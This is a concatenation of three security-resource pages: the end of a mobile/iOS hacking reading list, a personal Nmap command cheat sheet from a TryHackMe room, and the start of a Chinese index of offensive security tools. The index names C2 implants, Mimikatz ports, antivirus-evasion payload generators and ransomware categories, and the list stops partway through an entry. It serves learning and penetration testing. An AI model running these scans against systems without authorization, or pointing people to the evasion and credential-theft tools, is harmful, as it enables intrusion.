Exploring & Reversing Apple's Continuity Protocol-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Yen-Trust-In-Apples-Secret-Garden-Exploring-Reversing-Apples-Continuity-Protocol-3.pdf) * [Apple Platform Security](https://manuals.info.apple.com/MANUALS/1000/MA1902/en_US/apple-platform-security-guide.pdf) * [Mobile security, forensics & malware analysis with Santoku Linux](https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/viaForensics-AppSecUSA-Nov-2013.pdf) * [Stealing local files using Safari Web Share API](https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html?m=1) * [CVE-2020-9964 - An iOS infoleak](https://muirey03.blogspot.com/2020/09/cve-2020-9964-ios-infoleak.html?m=1) * [Attack Secure Boot of SEP](https://raw.githubusercontent.com/windknown/presentations/master/Attack_Secure_Boot_of_SEP.pdf) * [iOS 14 Forensics: What Has Changed Since iOS 13.7](https://blog.elcomsoft.com/2020/09/ios-14-forensics-what-has-changed-since-ios-13-7/) * [We Hacked Apple for 3 Months: Here’s What We Found](https://samcurry.net/hacking-apple/) * [Fun with XPC](https://medium.com/@ali.pourhadi/fun-with-xpc-153fd772d409) * [Bypass Facebook SSL Certificate Pinning for iOS](https://www.cyclon3.com/bypass-facebook-ssl-certificate-pinning-for-ios) * [Bypass Instagram SSL Certificate Pinning for iOS](https://www.cyclon3.com/bypass-instagram-ssl-certificate-pinning-for-ios) * [ASLR & the iOS Kernel — How virtual address spaces are randomised](https://bellis1000.medium.com/aslr-the-ios-kernel-how-virtual-address-spaces-are-randomised-d76d14dc7ebb) * [iOS/macOS penetration testing cheatsheet](https://github.com/ansjdnakjdnajkd/iOS) * [M1ssing Register Access Controls Leak EL0 State](https://m1racles.com/) * [Jailbroken iOS can't run macOS apps. I spent a week to find out why.](https://worthdoingbadly.com/macappsios/) * [Quick Analysis for the SSID Format String Bug](https://blog.chichou.me/2021/06/20/quick-analysis-wifid/) * [Unpatched iPhone Bug Allows Remote Device Takeover](https://threatpost.com/unpatched-iphone-bug-remote-takeover/167922/) * Reverse Engineering Starling Bank * [Part I: Obfuscation Techniques](https://hot3eed.github.io/2020/07/30/starling_p1_obfuscations.html) * [Part II: Jailbreak & Debugger Detection, Weaknesses & Mitigations](https://hot3eed.github.io/2020/08/02/starling_p2_detections_mitigations.html) * [ProtonMail : forensic decryption of iOS App](https://xperylab.medium.com/protonmail-forensic-decryption-of-ios-app-8e9ae9f50953) * [iOS on QEMU](https://github.com/alephsecurity/xnu-qemu-arm64) * [Proxying is not the only way to monitor network traffic on your iOS mobile apps](https://twitter.com/ddouhine/status/1430881952559685633?s=28) * [Forensic guide to iMessage, WhatsApp, Telegram, Signal and Skype data acquisition](https://blog.elcomsoft.com/2020/04/forensic-guide-to-imessage-whatsapp-telegram-signal-and-skype-data-acquisition/) * [Malware uses Corporate MDM as attack vector](https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/) * [Mobexler Checklist](https://mobexler.com/checklist.htm) * [Ad Fraud Spotted in Barcode Reader Malware Analysis](https://www.trendmicro.com/en_us/research/20/f/barcode-reader-apps-on-google-play-found-using-new-ad-fraud-technique.html) * [Researching Confide Messenger Encryption](https://blog.elcomsoft.com/2020/06/researching-confide-messenger-encryption/) * [Reverse Engineering Snapchat (Part I): Obfuscation Techniques](https://hot3eed.github.io/snap_part1_obfuscations.html) * [Reverse Engineering Snapchat (Part II): Deobfuscating the Undeobfuscatable](https://hot3eed.github.io/2020/06/22/snap_p2_deobfuscation.html) * [Firebase Cloud Messaging Service Takeover](https://abss.me/posts/fcm-takeover/) * [Saying Goodbye to my Favorite 5 Minute P1](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) * [Reverse engineering Flutter apps (Part 1)](https://blog.tst.sh/reverse-engineering-flutter-apps-part-1/) * [How I Hacked facebook Again!](https://hitcon.org/2020/slides/How%20I%20Hacked%20Facebook%20Again!.pdf) * [Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS](https://research.checkpoint.com/2020/instagram_rce-code-execution-vulnerability-in-instagram-app-for-android-and-ios/) * [How to use Ghidra to Reverse Engineer Mobile Application](https://infosecwriteups.com/how-to-use-ghidra-to-reverse-engineer-mobile-application-c2c89dc5b9aa) * [React Native Application Static Analysis](https://suam.wtf/posts/react-native-application-static-analysis-en/) * [Pentesting Non-Proxy Aware Mobile Applications Without Root/Jailbreak](https://medium.com/@meshal_/pentesting-non-proxy-aware-mobile-applications-65161f62a965) * [CVE-2021-30737 - Vulnerability Overview](http://phrack.org/issues/70/12.html#article) * [CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability](https://googleprojectzero.blogspot.com/2022/04/cve-2021-30737-xerubs-2021-ios-asn1.html) * [Facebook BugBounty Writeups](https://github.com/jaiswalakshansh/Facebook-BugBounty-Writeups) ## Остальные материалы * [OWASP MSTG](https://github.com/OWASP/owasp-mstg/) * [Full Mobile Hacking Course](https://mega.nz/folder/spoGDToC#zjYFlRAU7S06u5jSaQnvYw) * [NowSecure Academy](https://academy.nowsecure.com/)
# Nmap commands used so far [Tryhackme Room](https://tryhackme.com/room/furthernmap) [Cheat Sheet](https://www.stationx.net/nmap-cheat-sheet/) ## Basics to know - Total 65535 ports are available in a computer - 1024 ports are common ones - If a syn request from nmap is dropped by firewall, nmap considers the port to be filtered ## Options - `-A` For Aggressive mode, So noisy - `-F` For faster scan - `-T<1-5>` For specifying how faster the scan should be performed, the higher the number the speedier the scan - `-p` <port/port-range> For specifying the port number to scan - `-p-` For scanning all the ports - `-p-100` For scanning till port 100 - `-sn` For performing ping scan, testing the host is up or not - `-sS` For syn/Synchoronus scan - `-sU` For UDP only scan - `-sV` For guessing the version number of the service - `-sC` Will also check the default nmap scripts on the target - `-O` For os detection - `-oN <path>` For storing the output in normal formatting scheme - `-oA <path>` For storing the output in all the major formats - `--script=<name>` For performing scan with specified script - `--top-ports <number>` Will scan for top `<number>` pots only ## Raw commands - `nmap -A 123.123.123.123 -T4` enable OS and version detection, script scanning, and traceroute - -T4 for faster execution; and then the hostname. -A is for aggressive scanning - `nmap -p 80 123.123.123.123` scan specified port. - `nmap -sn 0.0.0.0` Ping scan, see if the host is up or not. - `nmap -sU 0.0.0.0` UDP scan - `nmap -sS 0.0.0.0` For Syn/Synchronus scan - `nmap -F 0.0.0.0` Fast scan - `nmap 0.0.0.0. --script=default` or `nmap 0.0.0.0 -sC` Scan with default scripts - `nmap 0.0.0.0 -oA` will output the text in three major formats-> text, script_kiddie, xml - `nmap 0.0.0.0 -oN nmapOut.txt` output result in normal mode - `nmap 0.0.0.0 -O` Enables os detection - `nmap 0.0.0.0 -sV` tries to guess the version number of the service on the open port - ## Basic commands to copy-paste - `nmap -sC -sV -v -oN nmap.txt $(cat ip)` - `nmap -T5 -p- -vv -sV -oN nmap.txt $(cat ip)` Just for checking whether the port is open or not. - `-T5` for speed - `-p-` For scanning all the ports - `sV` For detecting service version - `nmap -T5 -p- -vv -sV -Pn -oN nmap.txt $(cat ip)` Just for checking whether the port is open or not. - `-Pn` for bypassing icmp block - `nmap -T5 -p21,22,80 -A -sC $(cat ip)` For specific aggressive scan - `-A` for aggressive - `-sC` for running default scripts on the target ## Nmap scripts [Doc](https://nmap.org/book/man-nse.html) - `nmap --script=smb*` will use all scripts starting with the keyword `smb`
# 所有收集类项目: - [收集的所有开源工具](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式 - [逆向资源](https://github.com/alphaSeclab/awesome-reverse-engineering): IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/Android安全/iOS安全/Window安全/Linux安全/macOS安全/游戏Hacking/Bootkit/Rootkit/Angr/Shellcode/进程注入/代码注入/DLL注入/WSL/Sysmon/... - [网络相关的安全资源](https://github.com/alphaSeclab/awesome-network-stuff): 代理/GFW/反向代理/隧道/VPN/Tor/I2P,以及中间人/PortKnocking/嗅探/网络分析/网络诊断等 - [攻击性网络安全资源](https://github.com/alphaSeclab/awesome-cyber-security): 漏洞/渗透/物联网安全/数据渗透/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/免杀/CobaltStrike/侦查/OSINT/社工/密码/凭证/威胁狩猎/Payload/WifiHacking/无线攻击/后渗透/提权/UAC绕过/... # PenetrationTesting [English Version](https://github.com/alphaSeclab/awesome-cyber-security/blob/master/Readme_en.md) Github的Readme显示不会超过4000行,而此Repo添加的工具和文章近万行,默认显示不全。当前页面是减配版:工具星数少于200且500天内没更新的不在此文档中显示。 点击这里查看完整版:[中文-完整版](https://github.com/alphaSeclab/awesome-cyber-security/blob/master/Readme_full.md) # 目录 - [新添加的](#94ca60d12e210fdd7fd9e387339b293e) - [工具](#9eee96404f868f372a6cbc6769ccb7f8) - [(1103) 新添加的](#31185b925d5152c7469b963809ceb22d) - [未分类](#f34b4da04f2a77a185729b5af752efc5) - [新添加1](#b9dc08e7e118fc7af41df5e0ef9ddc3c) - [新添加2](#efb2cfb167e34b03243547cfb3a662ac) - [未分类3](#f04dd1be8e552b074dde7cb33ae6c84c) - [未分类4](#cbb37de8d70e314ce905d78c566ef384) - [未分类5](#bb7173c3a2ea52d046c8abe3c57e3291) - [(1) 其他](#f7654997cf8b691617b89c5e523a942f) - [(3) 古老的&&有新的替代版本的](#d5e869a870d6e2c14911de2bc527a6ef) - [文章](#8603294b7c1f136b866b6402d63a9978) - [新添加的](#f110da0bf67359d3abc62b27d717e55e) - [收集&&集合](#a4ee2f4d4a944b54b2246c72c037cd2e) - [(222) 未分类](#e97d183e67fa3f530e7d0e7e8c33ee62) - [(9) 混合型收集](#664ff1dbdafefd7d856c88112948a65b) - [(12) 无工具类收集](#67acc04b20c99f87ee625b073330d8c2) - [(1) 收集类的收集](#24707dd322098f73c7e450d6b1eddf12) - [(7) 教育资源&&课程&&教程&&书籍](#9101434a896f20263d09c25ace65f398) - [笔记&&Tips&&Tricks](#8088e46fc533286d88b945f1d472bf57) - [(12) 未分类](#f57ccaab4279b60c17a03f90d96b815c) - [(1) blog](#0476f6b97e87176da0a0d7328f8747e7) - [Talk&&Conference ](#df8ec4a66ef5027bbcc591c94f8de1e5) - [(1) 文档&&Documentation&&规则说明&&RFC](#4be58a3a00f83975b0321425db3b9b68) - [特定目标](#7e840ca27f1ff222fd25bc61a79b07ba) - [(4) 未分类-XxTarget](#eb2d1ffb231cee014ed24d59ca987da2) - [(113) AWS](#c71ad1932bbf9c908af83917fe1fd5da) - [(1) Phoenix](#88716f4591b1df2149c2b7778d15d04e) - [(4) Kubernetes](#4fd96686a470ff4e9e974f1503d735a2) - [(1) Azure](#786201db0bcc40fdf486cee406fdad31) - [(1) Nginx](#40dbffa18ec695a618eef96d6fd09176) - [(1) ELK](#6b90a3993f9846922396ec85713dc760) - [(1) GoogleCloud&&谷歌云](#6730dabeca61fcf64d4f7631abae6734) - [物联网(IoT)&&嵌入式设备&&路由器&&交换机&&智能设备&&打印机](#d55d9dfd081aa2a02e636b97ca1bad0b) - [工具](#9a20a70f58ea7946f24224c5d73fac15) - [(46) 未分类-IoT](#cda63179d132f43441f8844c5df10024) - [(1) 打印机 ](#72bffacc109d51ea286797a7d5079392) - [(4) 路由器&&交换机](#c9fd442ecac4e22d142731165b06b3fe) - [(1) 嵌入式设备](#3d345feb9fee1c101aea3838da8cbaca) - [文章](#01e638f09e44280ae9a1a95fc376edc5) - [新添加](#a4a3bcead86d9f9f7977479dfe94797d) - [渗透&&offensive&&渗透框架&&后渗透框架](#1233584261c0cd5224b6e90a98cc9a94) - [工具](#5dd93fbc2f2ebc8d98672b2d95782af3) - [(310) 未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e) - [(13) 渗透多合一&&渗透框架](#2051fd9e171f2698d8e7486e3dd35d87) - [(4) 自动化](#fc8737aef0f59c3952d11749fe582dac) - [(4) 收集](#9081db81f6f4b78d5c263723a3f7bd6d) - [Burp](#39e9a0fe929fffe5721f7d7bb2dae547) - [(2) 收集](#6366edc293f25b57bf688570b11d6584) - [(425) 未分类-Burp](#5b761419863bc686be12c76451f49532) - [(4) 数据渗透&&DataExfiltration](#3ae4408f4ab03f99bab9ef9ee69642a8) - [Metasploit](#8e7a6a74ff322cbf2bad59092598de77) - [(178) 未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) - [横向渗透](#adfa06d452147ebacd35981ce56f916b) - [(36) 免杀&&躲避AV检测](#b1161d6c4cb520d0cd574347cd18342e) - [(107) C&C](#98a851c8e6744850efcb27b8e93dff73) - [(96) DDOS](#a0897294e74a0863ea8b83d11994fad6) - [(148) Kali](#7667f6a0381b6cded2014a0d279b5722) - [(163) OWASP](#8e1069b2bce90b87eea762ee3d0935d8) - [(76) CobaltStrike](#0b8e79b79094082d0906153445d6ef9a) - [CMS](#fb821e664950df22549557cb8cc54afe) - [日志](#53f3011d262d2554156afe18d7ad6a43) - [劫持&&各种劫持](#b0233cd346f5ee456ee04bf653b12ae2) - [(51) 未分类-Hijack](#b087f1741bcf7c449d2910d052a7f312) - [点击劫持](#ecdeb90ce9bd347ca7f9d366d157689d) - [(31) RedTeam](#8afafc25f4fb0805556003864cce90e2) - [(15) BlueTeam](#4c42a9cc007de389f975cb0ce146c0ed) - [文章](#f21aa1088a437dbb001a137f6f885530) - [新添加的](#7229723a22769af40b96ab31fb09dcc7) - [Metasploit](#6280e13d236b0f18c75894d304309416) - [BurpSuite](#082a9e72817adcf2f824767e3e2ce597) - [CobaltStrike ](#6710d6fe61cbbc36b2ba75de156eda8a) - [扫描器&&安全扫描&&App扫描&&漏洞扫描](#8f92ead9997a4b68d06a9acf9b01ef63) - [工具](#132036452bfacf61471e3ea0b7bf7a55) - [(291) 未分类-Scanner](#de63a029bda6a7e429af272f291bb769) - [(20) 隐私&&Secret&&Privacy扫描](#58d8b993ffc34f7ded7f4a0077129eb2) - [隐私存储](#1927ed0a77ff4f176b0b7f7abc551e4a) - [(1) 未分类](#1af1c4f9dba1db2a4137be9c441778b8) - [(26) 隐写](#362dfd9c1f530dd20f922fd4e0faf0e3) - [文章](#1d8298e4ee4ad3c3028a1e157f85f27b) - [新添加的](#7669ebab00d00c744abc35195fbaa833) - [侦察&&信息收集&&子域名发现与枚举&&OSINT](#a76463feb91d09b3d024fae798b92be6) - [工具](#170048b7d8668c50681c0ab1e92c679a) - [(210) 未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) - [(81) 子域名枚举&&爆破](#e945721056c78a53003e01c3d2f3b8fe) - [(183) 信息收集&&侦查&&Recon&&InfoGather](#375a8baa06f24de1b67398c1ac74ed24) - [(75) 指纹&&Fingerprinting](#016bb6bd00f1e0f8451f779fe09766db) - [(1) 收集](#6ea9006a5325dd21d246359329a3ede2) - [社交网络](#dc74ad2dd53aa8c8bf3a3097ad1f12b7) - [(2) Twitter](#de93515e77c0ca100bbf92c83f82dc2a) - [(5) 其他-SocialNetwork](#6d36e9623aadaf40085ef5af89c8d698) - [(13) Github](#8d1ae776898748b8249132e822f6c919) - [(71) DNS](#a695111d8e30d645354c414cb27b7843) - [(68) Shodan](#18c7c1df2e6ae5e9135dfa2e4eb1d4db) - [(187) nmap](#94c01f488096fafc194b9a07f065594c) - [文章](#b0ca6c8512a268e8438d5e5247a88c2f) - [新添加](#5a855113503106950acff4d7dbb2403e) - [社工(SET)&&钓鱼&&鱼叉攻击](#546f4fe70faa2236c0fbc2d486a83391) - [工具](#3e622bff3199cf22fe89db026b765cd4) - [(11) 未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7) - [(2) 社工](#f30507893511f89b19934e082a54023e) - [(156) 钓鱼&&Phish](#290e9ae48108d21d6d8b9ea9e74d077d) - [鱼叉攻击](#ab3e6e6526d058e35c7091d8801ebf3a) - [文章](#8f6c7489870c7358c39c920c83fa2b6b) - [新添加的](#d7e332e9e235fd5a60687800f5ce184c) - [环境配置&&分析系统](#dc89c90b80529c1f62f413288bca89c4) - [工具](#9763d00cbe773aa10502dbe258f9c385) - [(10) 未分类-Env](#f5a7a43f964b2c50825f3e2fee5078c8) - [(5) Linux-Distro](#cf07b04dd2db1deedcf9ea18c05c83e0) - [(3) 环境自动配置&&自动安装](#4709b10a8bb691204c0564a3067a0004) - [文章](#6454949c0d580904537643b8f4cd5a6b) - [新添加的](#873294ea77bc292b6fc4cfb2f9b40049) - [密码&&凭证&&认证](#c49aef477cf3397f97f8b72185c3d100) - [工具](#862af330f45f21fbb0d495837fc7e879) - [(98) 未分类-Password](#20bf2e2fefd6de7aadbf0774f4921824) - [(43) 密码](#86dc226ae8a71db10e4136f4b82ccd06) - [(15) 认证&&Authenticate](#764122f9a7cf936cd9bce316b09df5aa) - [文章](#5fda419e854b390c8361d347f48607ce) - [新添加的](#776c034543a65be69c061d1aafce3127) - [辅助周边](#43b0310ac54c147a62c545a2b0f4bce2) - [(12) 未分类-Assist](#569887799ee0148230cc5d7bf98e96d0) - [(34) TLS&&SSL&&HTTPS](#86d5daccb4ed597e85a0ec9c87f3c66f) - [防护&&Defense](#946d766c6a0fb23b480ff59d4029ec71) - [工具](#0abd611fc3e9a4d9744865ca6e47a6b2) - [(101) WAF](#784ea32a3f4edde1cd424b58b17e7269) - [(119) 防火墙&&FireWall](#ce6532938f729d4c9d66a5c75d1676d3) - [(39) IDS&&IPS](#ff3e0b52a1477704b5f6a94ccf784b9a) - [(43) 未分类-Defense](#7a277f8b0e75533e0b50d93c902fb351) - [(3) 隐私保护&&Privacy](#6543c237786d1f334d375f4d9acdeee4) - [文章](#5aac7367edfef7c63fc95afd6762b773) - [新添加的](#04aac0e81b87788343930e9dbf01ba9c) - [SoftwareDefinedRadio](#52b481533d065d9e80cfd3cca9d91c7f) - [(6) 工具](#015984b1dae0c9aa03b3aa74ea449f3f) - [文章](#043e62cc373eb3e7b3910b622cf220d8) - [LOLBin&&LOLScript](#507f1a48f4709abb1c6b0d2689fd15e6) - [(2) 工具](#ec32edc7b3e441f29c70f6e9bca0174a) - [文章](#9bffad3ac781090ab31d4013bf858dd9) - [日志&&Log](#e25d233159b1dc40898ff0c74574f790) - [(1) 工具](#13df0f4d5c7a1386b329fd9e43d8fc15) - [文章](#06e7d46942d5159d19aa5c36f66f174a) - [威胁狩猎&&ThreatHunt](#9b026a07fdf243c6870ce91f00191214) - [工具](#b911aad7512e253660092942e06d00ad) - [(1) 未分类](#0b27f97199330c4945572a1f9c229000) - [文章](#f613271a55b177f626b42b8c728a0b1c) - [新添加的](#3828e67170e5db714c9c16f663b42a5e) - [Crypto&&加密&&密码学](#d6b02213a74372407371f77dd6e39c99) - [(13) 工具](#41d260119ad54db2739a9ae393bd87a5) - [文章](#cc043f672c90d4b834cdae80bfbe8851) - [恶意代码&&Malware&&APT](#8cb1c42a29fa3e8825a0f8fca780c481) - [(12) 工具](#e2fd0947924229d7de24b9902e1f54a0) - [文章](#cfffc63a6302bd3aa79a0305ed7afd55) - [REST_API&&RESTFUL ](#7d5d2d22121ed8456f0c79098f5012bb) - [(3) 工具](#3b127f2a89bc8d18b4ecb0d9c61f1d58) - [文章](#b16baff7e1b11133efecf1b5b6e10aab) - [蓝牙&&Bluetooth](#ceb90405292daed9bb32ac20836c219a) - [(3) 工具](#c72811e491c68f75ac2e7eb7afd3b01f) - [文章](#97e1bdced96fc7fcd502174d6eecee36) - [浏览器&&browser](#76df273beb09f6732b37a6420649179c) - [(21) 工具](#47a03071becd6df66b469df7c2c6f9b5) - [文章](#ca0c0694dc0aa87534e9bb19be4ee4d5) - [MitreATT&CK](#249c9d207ed6743e412c8c8bcd8a2927) - [工具](#a88c0c355b342b835fb42abee283bd71) - [(27) 未分类的](#6ab6835b55cf5c8462c4229a4a0ee94c) - [文章](#8512ba6c3855733a1474ca2f16153906) - [新添加的](#4b17464da487fbdf719e9a1482abf8f1) - [破解&&Crack&&爆破&&BruteForce](#de81f9dd79c219c876c1313cd97852ce) - [工具](#73c3c9225523cbb05333246f23342846) - [(255) 未分类的](#53084c21ff85ffad3dd9ce445684978b) - [文章](#171e396a8965775c27602762c6638694) - [新添加的](#fc3c73849911ede2ce0d6d02f1f5b0b9) - [泄漏&&Breach&&Leak](#96171a80e158b8752595329dd42e8bcf) - [工具](#602bb9759b0b2ba5555b05b7218a2d6f) - [(15) 未分类](#dc507c5be7c09e1e88af7a1ad91e2703) - [文章](#fb3bccf80281e11fdf4ef06ddaa34566) - [新添加的](#339727dd5a006d7a5bd8f0173dc80bb9) - [爬虫](#785ad72c95e857273dce41842f5e8873) - [工具](#0f931c85ab54698d0bcfaf9a3e6dac73) - [(1) 未分类](#442f9390fd56008def077a21ab65d4aa) - [文章](#23b008498c8b41ec3128bd9855660b7d) - [新添加的](#37ca6907aa42dfd32db5973ff9eec83d) - [无线&&WiFi&&AP&&802.11](#39931e776c23e80229368dfc6fd54770) - [(184) 未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) - [(7) WPS&&WPA&&WPA2](#8d233e2d068cce2b36fd0cf44d10f5d8) - [(2) 802.11](#8863b7ba27658d687a85585e43b23245) - [Payload&&远控&&RAT](#80301821d0f5d8ec2dd3754ebb1b4b10) - [工具](#783f861b9f822127dba99acb55687cbb) - [(134) 未分类-payload](#6602e118e0245c83b13ff0db872c3723) - [(20) Payload收集](#b5d99a78ddb383c208aae474fc2cb002) - [(44) 远控&&RAT](#b318465d0d415e35fc0883e9894261d1) - [(58) Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) - [(34) Botnet&&僵尸网络](#c45a90ab810d536a889e4e2dd45132f8) - [(70) 后门&&添加后门](#b6efee85bca01cde45faa45a92ece37f) - [(105) 混淆器&&Obfuscate](#85bb0c28850ffa2b4fd44f70816db306) - [(1) Payload管理](#78d0ac450a56c542e109c07a3b0225ae) - [(32) 勒索软件](#d08b7bd562a4bf18275c63ffe7d8fc91) - [(32) 键盘记录器&&Keylogger](#82f546c7277db7919986ecf47f3c9495) - [(13) Meterpreter](#8f99087478f596139922cd1ad9ec961b) - [(6) Payload投递](#63e0393e375e008af46651a3515072d8) - [文章](#0b644b2d8119abf6643755ef455fcf2c) - [新添加](#27962a7633b86d43cae2dd2d4c32f1b6) - [后渗透](#a9494547a9359c60f09aea89f96a2c83) - [工具](#3ed50213c2818f1455eff4e30372c542) - [(49) 未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7) - [(53) 提权&&PrivilegeEscalation](#4c2095e7e192ac56f6ae17c8fc045c51) - [Windows](#caab36bba7fa8bb931a9133e37d397f6) - [(19) UAC](#58f3044f11a31d0371daa91486d3694e) - [(72) 未分类-Windows](#7ed8ee71c4a733d5e5e5d239f0e8b9e0) - [(3) AppLocker](#b84c84a853416b37582c3b7f13eabb51) - [(10) ActiveDirectory](#e3c4c83dfed529ceee65040e565003c4) - [域渗透](#25697cca32bd8c9492b8e2c8a3a93bfe) - [WET](#a5c1d88a8e35b6c6223a6d64dbfb5358) - [(10) 驻留&&Persistence](#2dd40db455d3c6f1f53f8a9c25bbe63e) - [Linux&&Xnix](#4fc56d3dd1977b882ba14a9fd820f8e2) - [文章](#c86567da7d4004149912383575be3b45) - [新添加](#fdf10af493284be94033d1350f1e9b5c) # <a id="94ca60d12e210fdd7fd9e387339b293e"></a>新添加的 *** ## <a id="9eee96404f868f372a6cbc6769ccb7f8"></a>工具 ### <a id="31185b925d5152c7469b963809ceb22d"></a>新添加的 - [**825**星][2m] [Py] [corelan/mona](https://github.com/corelan/mona) 用于Immunity Debugger的mona.py - [**813**星][26d] [JS] [sindresorhus/is-online](https://github.com/sindresorhus/is-online) 检查互联网连接是否正常 - [**810**星][2m] [Shell] [andreyvit/create-dmg](https://github.com/andreyvit/create-dmg) 用于构建精美DMG的Shell脚本 - [**793**星][2m] [Go] [dreddsa5dies/gohacktools](https://github.com/dreddsa5dies/gohacktools) Golang编写的多款Hacking工具 - [**786**星][1y] [PS] [kevin-robertson/invoke-thehash](https://github.com/kevin-robertson/invoke-thehash) 执行 pass the hash WMI 和 SMB 任务的PowerShell函数 - [**783**星][26d] [Go] [bishopfox/sliver](https://github.com/bishopfox/sliver) 一个通用的跨平台植入程序框架,该框架C3支持Mutual-TLS,HTTP(S)和DNS - [**770**星][13d] [C++] [shekyan/slowhttptest](https://github.com/shekyan/slowhttptest) 应用层DoS攻击模拟器 - [**770**星][18d] [C++] [snort3/snort3](https://github.com/snort3/snort3) 下一代Snort IPS(入侵防御系统)。 - [**761**星][1y] [Py] [greatsct/greatsct](https://github.com/greatsct/greatsct) 生成绕过常见防病毒解决方案和应用程序白名单解决方案的metasploit payload - [**760**星][11d] [HTML] [m4cs/babysploit](https://github.com/m4cs/babysploit) 渗透测试工具包,旨在使您轻松学习如何使用更大,更复杂的框架(例如Metasploit) - [**743**星][1y] [C#] [eladshamir/internal-monologue](https://github.com/eladshamir/internal-monologue) 在不接触LSASS的情况下提取NTLM hash - [**742**星][6m] [Go] [talkingdata/owl](https://github.com/talkingdata/owl) 企业级分布式监控告警系 - [**731**星][2d] [Go] [gruntwork-io/cloud-nuke](https://github.com/gruntwork-io/cloud-nuke) 通过检查(删除)其中的所有资源来清理云帐户 - [**731**星][1m] [C] [iaik/zombieload](https://github.com/iaik/zombieload) ZombieLoad攻击PoC - [**729**星][2m] [Py] [shawndevans/smbmap](https://github.com/shawndevans/smbmap) SMB枚举 - [**728**星][6m] [Go] [anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) 结合多个开源 git 搜索工具实现的代码审计工具 - [**723**星][6d] [Py] [skelsec/pypykatz](https://github.com/skelsec/pypykatz) 纯Python实现的Mimikatz - [**720**星][1y] [C#] [p3nt4/powershdll](https://github.com/p3nt4/powershdll) 使用rundll32执行PowerShell,绕过软件限制 - [**716**星][6m] [Py] [adamlaurie/rfidiot](https://github.com/adamlaurie/rfidiot) python RFID / NFC library & tools - [**715**星][21d] [Py] [f-secure/see](https://github.com/f-secure/see) 在安全环境中构建测试自动化的框架 - [**703**星][2m] [Py] [mjg59/python-broadlink](https://github.com/mjg59/python-broadlink) Python模块,用于控制Broadlink RM2 / 3(Pro)遥控器、A1传感器平台和SP2 / 3智能插头 - [**695**星][3m] [netflix/security-bulletins](https://github.com/netflix/security-bulletins) Security Bulletins that relate to Netflix Open Source - [**693**星][7m] [Py] [mr-un1k0d3r/powerlessshell](https://github.com/mr-un1k0d3r/powerlessshell) 依靠MSBuild.exe远程执行PowerShell脚本和命令 - [**686**星][3m] [Go] [pquerna/otp](https://github.com/pquerna/otp) 一次性密码工具,Golang编写 - [**683**星][1y] [PS] [arvanaghi/sessiongopher](https://github.com/Arvanaghi/SessionGopher) 使用WMI为远程访问工具(如WinSCP,PuTTY,SuperPuTTY,FileZilla和Microsoft远程桌面)提取保存的会话信息。PowerShell编写 - [**682**星][1m] [ptresearch/attackdetection](https://github.com/ptresearch/attackdetection) 搜索新的漏洞和0day,进行服现并创建PoC exp,以了解这些安全漏洞的工作方式,以及如何在网络层上检测到相关的攻击 - [**679**星][1y] [Py] [endgameinc/rta](https://github.com/endgameinc/rta) 根据MITER ATT&CK进行建模,针对恶意tradecraft测试其检测功能。脚本框架 - [**679**星][5d] [C#] [ghostpack/rubeus](https://github.com/ghostpack/rubeus) 原始Kerberos交互和滥用,C#编写 - [**665**星][6m] [Py] [golismero/golismero](https://github.com/golismero/golismero) 安全测试框架,当前主要是Web安全,可轻松扩展到其他扫描 - [**665**星][12m] [C#] [wwillv/godofhacker](https://github.com/wwillv/godofhacker) 由各种顶级黑客技术结合而成,基本功能覆盖面广,可满足大多数人的基本需求 - [**656**星][6m] [PHP] [l3m0n/bypass_disable_functions_shell](https://github.com/l3m0n/bypass_disable_functions_shell) 一个各种方式突破Disable_functions达到命令执行的shell - [**647**星][3m] [Py] [gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) 有关攻击Jenkins服务器的笔记 - [**639**星][10m] [Py] [dirkjanm/privexchange](https://github.com/dirkjanm/privexchange) 通过滥用Exchange交换您对Domain Admin privs的特权 - [**635**星][1y] [JS] [alcuadrado/hieroglyphy](https://github.com/alcuadrado/hieroglyphy) 将所有JavaScript代码转换为等价的()[] {}!+字符序列!,可在浏览器中运行 - [**630**星][5m] [ankane/secure_rails](https://github.com/ankane/secure_rails) Rails安全最佳实战 - [**621**星][1m] [Go] [evilsocket/arc](https://github.com/evilsocket/arc) 可用于管理私密数据的工具. 后端是 Go 语言编写的 RESTful 服务器, 前台是Html + JavaScript - [**605**星][30d] [Py] [webrecorder/pywb](https://github.com/webrecorder/pywb) 重放和记录Web存档 - [**601**星][4d] [YARA] [didierstevens/didierstevenssuite](https://github.com/didierstevens/didierstevenssuite) 工具、脚本列表 - [**601**星][17d] [C] [mrexodia/titanhide](https://github.com/mrexodia/titanhide) 用于隐藏某些进程调试器的驱动程序 - [**599**星][2m] [PS] [ramblingcookiemonster/powershell](https://github.com/ramblingcookiemonster/powershell) 各种PowerShell函数和脚本 - [**588**星][11m] [C] [justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood) 跨站点脚本编写者的演示和教程,这些站点编写者不能很好地堆积缓冲区溢出,并且也想做其他事情 - [**583**星][10m] [Py] [romanz/amodem](https://github.com/romanz/amodem) 使用简单的耳机在两台计算机之间传输文件,实现真正的气密通信(通过扬声器和麦克风)或音频电缆(以提高传输速度) - [**582**星][1y] [C#] [tyranid/dotnettojscript](https://github.com/tyranid/dotnettojscript) 创建从内存中加载.NET v2程序集的JScript文件 - [**580**星][5m] [Py] [nidem/kerberoast](https://github.com/nidem/kerberoast) 一系列用于攻击MS Kerberos实现的工具 - [**570**星][1y] [Solidity] 